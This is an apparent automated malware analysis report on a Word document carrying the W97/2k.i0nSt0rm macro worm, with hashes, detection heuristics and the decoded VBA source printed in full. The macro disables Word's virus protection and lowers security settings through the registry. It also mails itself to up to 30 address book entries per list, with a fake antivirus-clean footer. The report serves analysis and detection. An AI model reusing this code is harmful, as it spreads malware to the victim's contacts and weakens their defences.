Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6897163a95edcea7…

MALICIOUS

Office (OLE)

41.0 KB Created: 2000-12-26 17:52:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: e908b258fd31297dcbea0c5e7e9a8ac2 SHA-1: acc550c68b960c8f41eb4138ae5b0c88dd6f1b34 SHA-256: 6897163a95edcea78340dee3f3495dcd0edf825a759488bc4cf66f5c1c1ab5b6
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a Document_Open VBA macro that utilizes WScript.Shell to modify security settings and potentially execute further actions. The macro attempts to save the document as 'ftip.doc' and interact with Outlook to send emails, suggesting a propagation or phishing attempt. The embedded URL 'http://www.grisoft.cz' is also noted.

Heuristics 8

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set dirwin = FSO.GetSpecialFolder(0)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Options.VirusProtection = False
Set FSO = CreateObject("Scripting.FileSystemObject")
Set dirwin = FSO.GetSpecialFolder(0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.grisoft.cz In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2747 bytes
SHA-256: 4cac8392c3c6041cae5e63cd47bb1656987dc0da0384db3561245abe544727f8
Detection
ClamAV: Doc.Trojan.Ftip-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' W97/2k.i0nSt0rm
' Code by gl_st0rm
    
Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Application.ShowVisualBasicEditor = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set FSO = CreateObject("Scripting.FileSystemObject")
Set dirwin = FSO.GetSpecialFolder(0)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
 If regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\i0nSt0rm") <> "...by gl" Then
  user = regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
  ActiveDocument.SaveAs FileName:=dirwin & "\ftip.doc", FileFormat:=wdFormatDocument
  Set Outlook = CreateObject("Outlook.Application")
  Set MAPI = Outlook.GetNameSpace("MAPI")
      MAPI.Logon "profile", "password"
      For Y = 1 To MAPI.AddressLists.Count
          Set AddyBook = MAPI.AddressLists(Y)
          X = 1
          Set Out = Outlook.CreateItem(0)
          For oo = 1 To AddyBook.AddressEntries.Count
              Mail = AddyBook.AddressEntries(X)
              Out.Recipients.Add Mail
              X = X + 1
              If X > 30 Then oo = AddyBook.AddressEntries.Count
           Next oo
           Out.Subject = "RE:"
           Out.Body = "Chtel si ftipy, tak tady je mas!!! ;)))"
           Out.Body = Out.Body & vbCrLf & ""
           Out.Body = Out.Body & vbCrLf & "[" & user & "]"
           Out.Body = Out.Body & vbCrLf & "---"
           Out.Body = Out.Body & vbCrLf & "Odchozí zpráva neobsahuje viry."
           Out.Body = Out.Body & vbCrLf & "Zkontrolováno antivirovým systémem AVG (http://www.grisoft.cz)."
           Out.Body = Out.Body & vbCrLf & "Verze: 6.0.219 / Virová báze: 103 - datum vydání: 5.12.2000"
           Out.Body = Out.Body & vbCrLf & vbCrLf & vbCrLf & vbCrLf
           Out.Attachments.Add (dirwin & "\ftip.doc")
           Out.DeleteAfterSubmit = True
           Out.Send
           Mail = ""
      Next Y
      MAPI.Logoff
      regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\i0nSt0rm", "...by gl"
 End If
'Application.Quit
End Sub
Private Sub Document_Close()
Dim M
M = Int((3 * Rnd) + 1)
 If M = 2 Then
  msg = "W97/2k.i0nSt0rm" & vbCrLf & "code by gl_st0rm"
  MsgBox msg, vbCritical, "Err0r! :->"
 End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.